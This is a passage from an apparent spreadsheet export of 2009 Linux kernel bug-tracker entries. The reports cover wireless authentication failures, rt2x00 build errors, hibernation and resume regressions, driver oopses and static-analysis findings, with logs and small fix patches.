    <t>Somewhere between 2.6.31-01335-g86d7101 and 2.6.31-07381-g7fa0772, WPA authentication broke in both 802.11g and 802.11n mode. It eventually (despite that wpa_supplicant.conf entry having priority -9999 and the Highwind network being visible) connected to a different network with no encryption; after disabling the catch-all entry that caused this, it's back to not authenticating. Relevant dmesg output: [ 881.503022] iwlagn: Intel(R) Wireless WiFi Link AGN driver for Linux, 1.3.27ks [ 881.503024] iwlagn: Copyright(c) 2003-2009 Intel Corporation [ 881.503131] iwlagn 0000:0b:00.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 881.503167] iwlagn 0000:0b:00.0: setting latency timer to 64 [ 881.503237] iwlagn 0000:0b:00.0: Detected Intel Wireless WiFi Link 4965AGN REV=0x4 [ 881.557974] iwlagn 0000:0b:00.0: Tunable channels: 13 802.11bg, 19 802.11a channels [ 881.558087] iwlagn 0000:0b:00.0: irq 30 for MSI/MSI-X [ 881.558436] phy2: Selected rate control algorithm 'iwl-agn-rs' [ 882.104712] iwlagn 0000:0b:00.0: firmware: requesting iwlwifi-4965-2.ucode [ 882.108542] iwlagn 0000:0b:00.0: loaded firmware version 228.61.2.24 [ 882.353825] ADDRCONF(NETDEV_UP): wlan0: link is not ready [ 1249.716954] wlan0: direct probe to AP 00:11:50:93:5f:12 (try 1) [ 1249.916127] wlan0: direct probe to AP 00:11:50:93:5f:12 (try 2) [ 1250.116132] wlan0: direct probe to AP 00:11:50:93:5f:12 (try 3) [ 1250.316137] wlan0: direct probe to AP 00:11:50:93:5f:12 timed out == Below messages are related to a different bug, and were around while iwlagn worked == [ 1263.097177] CE: hpet increasing min_delta_ns to 22500 nsec [ 1320.522627] ACPI: EC: GPE storm detected, transactions will use polling mode Relevant lspci output: 0b:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN Network Connection (rev 61) Subsystem: Intel Corporation Device 1101 Flags: bus master, fast devsel, latency 0, IRQ 30 Memory at d7300000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit+ Count=1/1 Enable+ Capabilities: [e0] Express Endpoint, MSI 00 Capabilities: [100] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSVoil- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSVoil- UESvrt: DLP+ SDES- TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSVoil- CESta: RxErr+ BadTLP+ BadDLLP- Rollover- Timeout- NonFatalErr+ CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 00, GenCap- CGenEn- ChkCap- ChkEn- Capabilities: [140] Device Serial Number 95-ec-2e-ff-ff-5c-21-00 Kernel driver in use: iwlagn Kernel modules: iwlagn Relevant wpa_cli output: &lt;2&gt;Trying to associate with 00:1f:f3:f6:96:89 (SSID='Highwind' freq=5180 MHz) &lt;2&gt;CTRL-EVENT-SCAN-RESULTS &lt;2&gt;CTRL-EVENT-SCAN-RESULTS &lt;2&gt;Authentication with 00:1f:f3:f6:96:89 timed out. &lt;2&gt;CTRL-EVENT-SCAN-RESULTS &lt;2&gt;Trying to associate with 00:1f:f3:f6:96:89 (SSID='Highwind' freq=5180 MHz) &lt;2&gt;CTRL-EVENT-SCAN-RESULTS &lt;2&gt;Authentication with 00:1f:f3:f6:96:89 timed out. &lt;2&gt;CTRL-EVENT-SCAN-RESULTS == Getting to this point took around ten minutes of the above three lines in various combinations == &lt;2&gt;Trying to associate with 00:11:50:93:5f:12 (SSID='belkin54g' freq=2462 MHz) &lt;2&gt;Association request to the driver failed &lt;2&gt;CTRL-EVENT-SCAN-RESULTS &lt;2&gt;Associated with 00:11:50:93:5f:12 &lt;2&gt;CTRL-EVENT-CONNECTED - Connection to 00:11:50:93:5f:12 completed (auth) [id=2 id_str=]</t>
  </si>
  <si>
    <t>Build Failure: wrong headers in rt2x00lib.h cause build failure for rt2x00dev.c</t>
  </si>
  <si>
    <t>Linus' git tree; linux-next since early September</t>
  </si>
  <si>
    <t>2009-09-23 20:58 UTC</t>
  </si>
  <si>
    <t>2009-09-29 18:49 UTC</t>
  </si>
  <si>
    <t>Created attachment 23160 [details] Patch to resolve build error. Since linux-next-20090903 (possibly a few days earlier -- was on holiday), I've been getting build failures for rt2x00dev.c because of wrongly-formatted headers for rt2x00crypto_rx_insert_iv. The attached patch resolves the issue for me and applied cleanly and built on tonight's Linus tree as well as linux-next trees from last week. I sent patches to linux-next and linux-net but had no acknowledgement, and am preparing a re-send to include LKML too. I'm horrified that a fixable bug with an existing patch has migrated to Linus' mainline for 2.6.32.</t>
  </si>
  <si>
    <t>Hibernation oopses for the 2nd time with 2.6.31 (won't fit the screen)</t>
  </si>
  <si>
    <t>2009-09-24 14:07 UTC</t>
  </si>
  <si>
    <t>2009-10-08 21:10 UTC</t>
  </si>
  <si>
    <t>Hibernation worked great with 2.6.30 - I had over a month of uptime (it never worked so well before - always crashed after some time). But in 2.6.31, it's broken again - and completely. The first hibernation works but it always crashes on the second one. The oops won't fit the screen, even 1280x1024 is not enough. I bisected it and found this: c7121843685de2bf7f3afd3ae1d6a146010bf1fc is first bad commit commit c7121843685de2bf7f3afd3ae1d6a146010bf1fc Author: Magnus Damm &lt;magnus.damm@gmail.com&gt; Date: Tue Jul 28 14:09:55 2009 -0700 clocksource: Save mult_orig in clocksource_disable() To fix the common case where -&gt;enable() does not set up mult, make sure mult_orig is saved in mult on disable. Also add comments to explain why we do this. Signed-off-by: Magnus Damm &lt;damm@igel.co.jp&gt; Cc: johnstul@us.ibm.com Cc: lethal@linux-sh.org Cc: akpm@linux-foundation.org LKML-Reference: &lt;20090618152432.10136.9932.sendpatchset@rx1.opensource.se&gt; Signed-off-by: Thomas Gleixner &lt;tglx@linutronix.de&gt; :040000 040000 c965062bc79af46cdb3522fc7ab1cc81d2f84de3 26616c88a8128b25fd15c3da39ac6251cd9723b6 M include Reverting this commit fixes the problem.</t>
  </si>
  <si>
    <t>Doesnt build, related to rt2x00dev.c</t>
  </si>
  <si>
    <t>2.6.31-git14</t>
  </si>
  <si>
    <t>2009-09-24 15:07 UTC</t>
  </si>
  <si>
    <t>2009-09-27 16:43 UTC</t>
  </si>
  <si>
    <t>This version and previous dont compile due to a wrong header (or wrong call) for rt2x00crypto_rx_insert_iv. Here are the error messages: CC [M] drivers/net/wireless/rt2x00/rt2x00dev.o drivers/net/wireless/rt2x00/rt2x00dev.c: In function ‘rt2x00lib_rxdone’: drivers/net/wireless/rt2x00/rt2x00dev.c:405: warning: passing argument 3 of ‘rt2x00crypto_rx_insert_iv’ makes integer from pointer without a cast drivers/net/wireless/rt2x00/rt2x00dev.c:405: error: too few arguments to function ‘rt2x00crypto_rx_insert_iv’ make[5]: *** [drivers/net/wireless/rt2x00/rt2x00dev.o] Error 1 make[4]: *** [drivers/net/wireless/rt2x00] Error 2 make[3]: *** [drivers/net/wireless] Error 2 make[2]: *** [drivers/net] Error 2 make[1]: *** [drivers] Error 2 Attached my .config file Regards Jean-Luc</t>
  </si>
  <si>
    <t>tty change breaks resume from hibernation on MSI Wind U100</t>
  </si>
  <si>
    <t>2.6.31-git-94a8d5caba</t>
  </si>
  <si>
    <t>2009-09-25 22:20 UTC</t>
  </si>
  <si>
    <t>2009-09-27 21:59 UTC</t>
  </si>
  <si>
    <t>Resume from hibernation doesn't work any more on my MSI Wind U100 with the current mainline. It hangs forever after devices have been resumed, apparently during the console switch back to the terminal where s2disk was started (the problem seems to be only reproducible with s2disk). Bisection turned up the following commit as the one that introduced the regression: commit b50989dc444599c8b21edc23536fc305f4e9b7d5 Author: Alan Cox &lt;alan@linux.intel.com&gt; Date: Sat Sep 19 13:13:22 2009 -0700 tty: make the kref destructor occur asynchronously We want to be able to sleep in the destructor for USB at least. It isn't a hot path so just pushing it to a work queue doesn't really cause any difficulty. Signed-off-by: Alan Cox &lt;alan@linux.intel.com&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; I'm not sure about the actual root cause at the moment, but it appears to be a race condition of some sort, as I'm able to reproduce this on a faster machine.</t>
  </si>
  <si>
    <t>The PC speaker console beep no longer happens</t>
  </si>
  <si>
    <t>2.6.30 2.6.30.6 2.6.31</t>
  </si>
  <si>
    <t>2009-09-26 13:02 UTC</t>
  </si>
  <si>
    <t>Allan Duncan</t>
  </si>
  <si>
    <t>2010-11-12 20:43 UTC</t>
  </si>
  <si>
    <t>I'm rather attached to the console beep on the traditional case speaker when using tab-complete to alert me to errors I have made. All the kernels later than 2.6.29.x do not make a sound despite the presence of the pcspkr module. I have seen mention of this on the fedora bugzilla, but I have established that a pure kernel.org version running at level 3 also fails.</t>
  </si>
  <si>
    <t>found a memory leak in linux-2.6.31/sound/soc/fsl/mpc5200_dma.c</t>
  </si>
  <si>
    <t>2009-09-26 16:54 UTC</t>
  </si>
  <si>
    <t>2012-06-13 17:11 UTC</t>
  </si>
  <si>
    <t>Hello, i have checked the linux kernel with the static code analysis tool cppchek. It found a memory leak in file /sound/soc/fsl/mpc5200_dma.c at line 456. Take a look at the code: ... /* Allocate and initialize the driver private data */ psc_dma = kzalloc(sizeof *psc_dma, GFP_KERNEL); if (!psc_dma) { iounmap(regs); return -ENOMEM; } /* Get the PSC ID */ prop = of_get_property(op-&gt;node, "cell-index", &amp;size); if (!prop || size &lt; sizeof *prop) 456 return -ENODEV; ... Indeed, there is a missing kfree(psc_dma). Best regards Ettl Martin</t>
  </si>
  <si>
    <t>found a possible null pointer dereference in file linux-2.6.31/sound/soc/soc-jack.c</t>
  </si>
  <si>
    <t>2009-09-26 17:09 UTC</t>
  </si>
  <si>
    <t>2012-06-13 18:51 UTC</t>
  </si>
  <si>
    <t>Hello, i have checked the linux kernel with the static code analysis tool cppcheck. It found a possible nullpointer dereference in file linux-2.6.31/sound/soc/soc-jack.c at line 61. Take a look at the code: void snd_soc_jack_report(struct snd_soc_jack *jack, int status, int mask) { 61 struct snd_soc_codec *codec = jack-&gt;card-&gt;codec; struct snd_soc_jack_pin *pin; int enable; int oldstatus; 66 if (!jack) { WARN_ON_ONCE(!jack); return; } .... Indeed, the pointer 'jack' is used at line 61. Then at line 66 it is checked for NULL. Best regards Martin</t>
  </si>
  <si>
    <t>Unable to unload b43 module</t>
  </si>
  <si>
    <t>2.6.31-git18;2.6.32-rc1</t>
  </si>
  <si>
    <t>2009-09-29 07:23 UTC</t>
  </si>
  <si>
    <t>Lorincz Andras</t>
  </si>
  <si>
    <t>2009-10-01 14:12 UTC</t>
  </si>
  <si>
    <t>I have a dell inspiron 1525n laptop with BCM4312 LP-PHY, lspci -vn showing: 0b:00.0 0280: 14e4:4315 (rev 01) Subsystem: 1028:000b The networking is working but I'm unable to unload b43, if I launch rmmod b43 then this comes up: Message from syslogd@lorandl at Sep 29 00:32:35 ... kernel:[ 1667.472277] Oops: 0000 [#1] SMP Message from syslogd@lorandl at Sep 29 00:32:35 ... kernel:[ 1667.472280] last sysfs file: /sys/class/power_supply/BAT0/charge_full Message from syslogd@lorandl at Sep 29 00:32:35 ... kernel:[ 1667.472382] Process rmmod (pid: 7093, ti=f4d68000 task=f747e500 task.ti=f4d68000) Message from syslogd@lorandl at Sep 29 00:32:35 ... kernel:[ 1667.472384] Stack: Message from syslogd@lorandl at Sep 29 00:32:35 ... kernel:[ 1667.472403] Call Trace: Message from syslogd@lorandl at Sep 29 00:32:35 ... kernel:[ 1667.472459] Code: 00 00 89 f0 0f b6 93 c8 02 00 00 e8 14 ff ff ff 0f b6 8b 4d 02 00 00 89 f0 0f b6 93 4c 02 00 00 5b 5e e9 fd fe ff ff 53 8b 58 04 &lt;83&gt; bb 04 01 00 00 00 74 15 8d 83 08 01 00 00 e8 cb f7 c1 ff c7 Message from syslogd@lorandl at Sep 29 00:32:35 ... kernel:[ 1667.472491] EIP: [&lt;f886c862&gt;] b43_leds_unregister+0x4/0x7e [b43] SS:ESP 0068:f4d69f04 Message from syslogd@lorandl at Sep 29 00:32:35 ... kernel:[ 1667.472499] CR2: 000000002f40667a After this the module remains loaded but cannot make the networking to function again just after a reboot. I've also seen that after bringing down the interface, the wifi led turns off and if the interface is up then the led turns on... does this mean that the rf hardware is turned on and off as if the hardware switch would be used?</t>
  </si>
  <si>
    <t>ACPI Exception: AE_TIME, Returned by Handler for [EmbeddedControl] flooding logs</t>
  </si>
  <si>
    <t>2009-09-29 20:51 UTC</t>
  </si>
  <si>
    <t>2009-10-06 02:24 UTC</t>
  </si>
  <si>
    <t>Subject : Re: [git pull request] ACPI &amp; driver patches for Linux-2.6.32-rc0 Submitter : Thomas Backlund &lt;tmb@mandriva.org&gt; Date : 2009-09-25 15:08 References : http://lkml.org/lkml/2009/9/25/121 Handled-By : Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Patch : http://patchwork.kernel.org/patch/50516/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: oops in gss_validate on 2.6.31</t>
  </si>
  <si>
    <t>2009-09-29 21:10 UTC</t>
  </si>
  <si>
    <t>2009-11-11 22:17 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: oops in gss_validate on 2.6.31 Submitter : Bastian Blank &lt;bastian@waldi.eu.org&gt; Date : 2009-09-16 10:29 References : http://marc.info/?l=linux-kernel&amp;m=125309700417283&amp;w=4 Handled-By : Trond Myklebust &lt;trond.myklebust@fys.uio.no&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at drivers/char/tty_io.c:1267</t>
  </si>
  <si>
    <t>2009-09-29 21:44 UTC</t>
  </si>
  <si>
    <t>2009-10-04 12:50 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31: crash in tty_io.c Submitter : Heinz Diehl &lt;htd@fancy-poultry.org&gt; Date : 2009-09-20 11:37 References : http://marc.info/?l=linux-kernel&amp;m=125344629506309&amp;w=4 References : http://lkml.org/lkml/2009/9/8/393 Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at fs/ext3/super.c:435</t>
  </si>
  <si>
    <t>2009-09-29 21:48 UTC</t>
  </si>
  <si>
    <t>2010-02-10 19:20 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.31] kernel BUG at fs/ext3/super.c:435 Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2009-09-21 7:29 References : http://marc.info/?l=linux-kernel&amp;m=125351816109264&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Memory leak in SCSI initialization</t>
  </si>
  <si>
    <t>2009-09-29 21:56 UTC</t>
  </si>
  <si>
    <t>2009-11-16 23:00 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.31] Memory leak in SCSI initialization? Submitter : Tetsuo Handa &lt;penguin-kernel@i-love.sakura.ne.jp&gt; Date : 2009-09-22 4:18 References : http://marc.info/?l=linux-kernel&amp;m=125359311312243&amp;w=4 Handled-By : Michael Ellerman &lt;michael@ellerman.id.au&gt; Patch : http://patchwork.kernel.org/patch/49258/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NFS problem with past 2.6.31 git tree</t>
  </si>
  <si>
    <t>2.6.32-rc1</t>
  </si>
  <si>
    <t>2009-09-29 22:08 UTC</t>
  </si>
  <si>
    <t>2009-10-11 20:26 UTC</t>
  </si>
  <si>
    <t>Subject : NFS problem with past 2.6.31 git tree Submitter : Zdenek Kabelac &lt;zdenek.kabelac@gmail.com&gt; Date : 2009-09-25 15:12 References : http://marc.info/?l=linux-kernel&amp;m=125389156504570&amp;w=4 Handled-By : Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; Patch : http://patchwork.kernel.org/patch/50428/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>T400 suspend/resume regression</t>
  </si>
  <si>
    <t>2009-09-29 22:12 UTC</t>
  </si>
  <si>
    <t>2009-10-03 22:55 UTC</t>
  </si>
  <si>
    <t>Subject : T400 suspend/resume regression -- bisected to a mystery merge commit Submitter : Theodore Tso &lt;tytso@mit.edu&gt; Date : 2009-09-26 6:57 References : http://marc.info/?l=linux-kernel&amp;m=125394827806011&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>e1000e jumbo frames no longer work: 'Unsupported MTU setting'</t>
  </si>
  <si>
    <t>2009-09-29 22:15 UTC</t>
  </si>
  <si>
    <t>2009-10-12 21:30 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31 regression: e1000e jumbo frames no longer work: 'Unsupported MTU setting' Submitter : Nix &lt;nix@esperi.org.uk&gt; Date : 2009-09-26 11:16 References : http://marc.info/?l=linux-kernel&amp;m=125396433321342&amp;w=4 Handled-By : Alexander Duyck &lt;alexander.duyck@gmail.com&gt; Patch : http://patchwork.kernel.org/patch/50277/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Wireless regression in 2.6.32-git</t>
  </si>
  <si>
    <t>2009-09-29 22:19 UTC</t>
  </si>
  <si>
    <t>2009-09-30 20:26 UTC</t>
  </si>
  <si>
    <t>Subject : [bisected] Wireless regression in 2.6.32-git Submitter : Arjan van de Ven &lt;arjan@infradead.org&gt; Date : 2009-09-27 13:18 References : http://marc.info/?l=linux-kernel&amp;m=125405753613128&amp;w=4 Handled-By : Johannes Berg &lt;johannes@sipsolutions.net&gt; Patch : http://patchwork.kernel.org/patch/50323/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.31-git wireless broken</t>
  </si>
  <si>
    <t>2009-09-29 22:25 UTC</t>
  </si>
  <si>
    <t>2009-09-30 20:24 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-git wireless broken Submitter : Hugh Dickins &lt;hugh.dickins@tiscali.co.uk&gt; Date : 2009-09-24 17:18 References : http://marc.info/?l=linux-wireless&amp;m=125381334332001&amp;w=4 Handled-By : Johannes Berg &lt;johannes@sipsolutions.net&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ifconfig: page allocation failure. order:5, mode:0x8020 w/ e100</t>
  </si>
  <si>
    <t>2009-09-29 22:31 UTC</t>
  </si>
  <si>
    <t>2010-06-20 12:55 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG 2.6.30+] e100 sometimes causes oops during resume Submitter : Karol Lewandowski &lt;karol.k.lewandowski@gmail.com&gt; Date : 2009-09-15 12:05 References : http://marc.info/?l=linux-kernel&amp;m=125301636509517&amp;w=4 Notify-Also : Mel Gorman &lt;mel@csn.ul.ie&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>regression in page writeback</t>
  </si>
  <si>
    <t>2009-09-29 22:37 UTC</t>
  </si>
  <si>
    <t>2009-10-12 21:33 UTC</t>
  </si>
  <si>
    <t>Subject : regression in page writeback Submitter : Shaohua Li &lt;shaohua.li@intel.com&gt; Date : 2009-09-22 5:49 References : http://marc.info/?l=linux-kernel&amp;m=125359858117176&amp;w=4 Handled-By : Wu Fengguang &lt;fengguang.wu@intel.com&gt; Notify-Also : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Notify-Also : Richard Kennedy &lt;richard@rsk.demon.co.uk&gt; Notify-Also : Chris Mason &lt;chris.mason@oracle.com&gt; Notify-Also : Andrew Morton &lt;akpm@linux-foundation.org&gt; Notify-Also : Dave Chinner &lt;david@fromorbit.com&gt; Notify-Also : Christoph Hellwig &lt;hch@infradead.org&gt; Notify-Also : Theodore Tso &lt;tytso@mit.edu&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Early boot exception</t>
  </si>
  <si>
    <t>2009-09-29 22:54 UTC</t>
  </si>
  <si>
    <t>2009-09-30 20:34 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-09194-g0d9df25 Early boot exception Submitter : Tony Vroon &lt;tony@linx.net&gt; Date : 2009-09-27 12:49 References : http://marc.info/?l=linux-kernel&amp;m=125405571911260&amp;w=4 Handled-By : Tejun Heo &lt;tj@kernel.org&gt; Patch : http://patchwork.kernel.org/patch/50413/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Something seems wrong with process time accounting</t>
  </si>
  <si>
    <t>2009-09-29 22:59 UTC</t>
  </si>
  <si>
    <t>2009-10-01 16:44 UTC</t>
  </si>
  <si>
    <t>Subject : Re: Linux 2.6.32-rc1 Submitter : Eric Dumazet &lt;eric.dumazet@gmail.com&gt; Date : 2009-09-28 15:39 References : http://marc.info/?l=linux-kernel&amp;m=125415243225739&amp;w=4 Notify-Also : Martin Schwidefsky &lt;schwidefsky@de.ibm.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit def0a9b2573e00ab0b486cb5382625203ab4c4a6 Author: Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Date: Fri Sep 18 20:14:01 2009 +0200 sched_clock: Make it NMI safe Signed-off-by: Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; First-Bad-Commit : def0a9b2573e00ab0b486cb5382625203ab4c4a6</t>
  </si>
  <si>
    <t>radeon KMS unusable on RadeonHD 3650</t>
  </si>
  <si>
    <t>2009-09-30 07:49 UTC</t>
  </si>
  <si>
    <t>2012-06-14 16:40 UTC</t>
  </si>
  <si>
    <t>Having KMS enabled just gives me a blank screen, be it X or console. My hardware is a T500 ThinkPad running Debian Sid (radeonhd 1.2.5, X.org core 1.6.4). It's running fine without KMS.</t>
  </si>
  <si>
    <t>kernel&gt;=2.6.31: ahci.c: do not force unconditionally sb600 to 32bit dma any more?</t>
  </si>
  <si>
    <t>&gt;=2.6.31</t>
  </si>
  <si>
    <t>2009-09-30 15:02 UTC</t>
  </si>
  <si>
    <t>2009-10-12 21:38 UTC</t>
  </si>
  <si>
    <t>Hello, apologies if I am missing some blatant point. After upgrading from 2.6.30.5 to 2.6.31 one of my machines was not booting any more, complaining like this (sata disks): ata2.00: qc timeout (cmd 0xec) ata2.00: failed to IDENTIFY (I/O error, err_mask=0x4) ata1.00: qc timeout (cmd 0xec) ata1.00: failed to IDENTIFY (I/O error, err_mask=0x4) ata3.00: qc timeout (cmd 0xa1) ata3.00: failed to IDENTIFY (I/O error, err_mask=0x4) Same after installing 2.6.31.1. It turned out that the problem is the sb600 SATA controller lying about its 64bit dma capability. As far as I seem to understand from ahci.c perusal, in &gt;=2.6.31 the sb600 is forced to 32bit dma *ONLY* on ASUS M2A-VM mother board, while it was unconditionally (?) reset to 32bit dma before 2.6.31. I am running on an ASROCK AliveXFire-eSATA2 mother board and experience the fake 64bit dma advertising of the sb600 controller. I know 0 (zero) about kernel and/or ATA coding; I can only say that the following patch: *** drivers/ata/ahci.c.ORIG Wed Sep 30 15:37:54 2009 --- drivers/ata/ahci.c Wed Sep 30 15:37:54 2009 *************** *** 433,438 **** --- 433,439 ---- [board_ahci_sb600] = { AHCI_HFLAGS (AHCI_HFLAG_IGN_SERR_INTERNAL | + AHCI_HFLAG_32BIT_ONLY | AHCI_HFLAG_NO_MSI | AHCI_HFLAG_SECT255), .flags = AHCI_FLAG_COMMON, .pio_mask = ATA_PIO4, fixes everything for me. My impression is that the sb600 forcing should be done in more cases than the single ASUS M2A-VM, or even unconditionally like it used to be before 2.6.31 (but, as I said above, my understanding is poor and I might be totally wrong). I will be glad to send any other detail (dmesg, lspci, mobo specs, ...) if needed. Hope that libata people will fix this problem easily. thanks for all your work ciao gabriele</t>
  </si>
  <si>
    <t>nfsroot will not remount rw and claims illegal options</t>
  </si>
  <si>
    <t>2.6.32-rc2</t>
  </si>
  <si>
    <t>2009-09-30 15:08 UTC</t>
  </si>
  <si>
    <t>2009-10-11 20:27 UTC</t>
  </si>
  <si>
    <t>this setup worked with 2.6.31 and older kernels. I did not test 2.6.32-rc1 /proc/cmdline: root=/dev/nfs nfsroot=10.10.0.2:/nfs/gemini,v3,tcp ro ip=::::::dhcp BOOT_IMAGE=nightlybuild-gemini I mount root ro because the slackware bootscripts likes this. When the remount command is executed I get this error: mount -w -v -n -o remount / mount.nfs: timeout set for Wed Sep 30 16:56:32 2009 mount.nfs: text-based options: 'nolock,addr=10.10.0.2' mount.nfs: mount(2): Invalid argument mount.nfs: an incorrect mount option was specified fstab: 10.10.0.2:/nfs/gemini / nfs rw,nolock 0 0 #10.10.0.2:/nfs/gemini / nfs rw,v3,tcp,nolock,noatime,nodiratime 0 0 10.10.0.2:/nfs/usr /usr nfs ro,vers=3,tcp,noatime,nodiratime 0 0 ... The #line was the original but gave the same error. /proc/mounts: rootfs / rootfs rw 0 0 /dev/root / nfs rw,relatime,vers=3,rsize=4096,wsize=4096,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=600,retrans=2,sec=sys,addr=10.10.0.2 0 0 /proc /proc proc rw,relatime 0 0 sysfs /sys sysfs rw,relatime 0 0 tmpfs /dev tmpfs rw,relatime,mode=755 0 0 devpts /dev/pts devpts rw,relatime,gid=5,mode=620 0 0 /dev/shm /tmp tmpfs rw,relatime,size=524288k 0 0 10.10.0.2:/nfs/usr /usr nfs ro,noatime,nodiratime,vers=3,rsize=131072,wsize=131072,namlen=255,hard,proto=tcp,port=65535,timeo=600,retrans=2,sec=sys,mountaddr=10.10.0.2,mountvers=3,mountproto=tcp,addr=10.10.0.2 0 0 ... I can remount /usr.</t>
  </si>
  <si>
    <t>Caught 8-bit read from freed memory in b43 driver at association</t>
  </si>
  <si>
    <t>2009-09-30 18:06 UTC</t>
  </si>
  <si>
    <t>2009-11-16 23:24 UTC</t>
  </si>
  <si>
    <t>Bluewhite64 13.0 Athlon 64 3000 in 64 bits mode Acer Aspire 1511LMi laptop Since 2.6.32-rc1 compiled with memcheck, I got the following error: b43-phy0: Loading firmware version 410.2160 (2007-05-26 15:32:10) ADDRCONF(NETDEV_UP): eth1: link is not ready WARNING: kmemcheck: Caught 8-bit read from freed memory (ffff8800429bb738) 0000000000000000000000000000000000000000000000001f20010000000000 f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f ^ Modules linked in: Pid: 5, comm: events/0 Not tainted 2.6.32-rc2 #3 Aspire 1510 RIP: 0010:[&lt;ffffffff8133c7ce&gt;] [&lt;ffffffff8133c7ce&gt;] b43_dma_tx+0x64e/0xbc0 RSP: 0018:ffff88004bbd7ca0 EFLAGS: 00010202 RAX: 0000000040000000 RBX: 0000000000c14020 RCX: 0000000000000001 RDX: 0000000000000000 RSI: 000000006000002a RDI: ffff88004f2d9930 RBP: ffff88004bbd7da0 R08: 0000000040c14020 R09: 0000000000000001 R10: 0000000000000001 R11: 0000000000000000 R12: 0000000000000020 R13: ffff88004255c720 R14: ffff8800429bbd00 R15: ffff8800429bb700 FS: 0000000001b1c860(0000) GS:ffffffff81783000(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: ffff88004f832550 CR3: 0000000040dec000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400 [&lt;ffffffff813242ce&gt;] b43_tx_work+0x5e/0x90 [&lt;ffffffff8104dd42&gt;] worker_thread+0x1d2/0x320 [&lt;ffffffff81051f9e&gt;] kthread+0x8e/0xa0 [&lt;ffffffff8100c1ca&gt;] child_rip+0xa/0x20 [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff eth1: deauthenticating by local choice (reason=3) eth1: direct probe to AP 00:07:cb:55:12:b0 (try 1) eth1: direct probe to AP 00:07:cb:55:12:b0 (try 1) eth1 direct probe responded eth1: authenticate with AP 00:07:cb:55:12:b0 (try 1) eth1: authenticated eth1: associate with AP 00:07:cb:55:12:b0 (try 1) eth1: RX AssocResp from 00:07:cb:55:12:b0 (capab=0x411 status=0 aid=2) eth1: associated ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready After that, everything works nice.</t>
  </si>
  <si>
    <t>New message "NOHZ: local_softirq_pending 08" at each ping request</t>
  </si>
  <si>
    <t>2009-09-30 18:12 UTC</t>
  </si>
  <si>
    <t>2009-10-26 18:29 UTC</t>
  </si>
  <si>
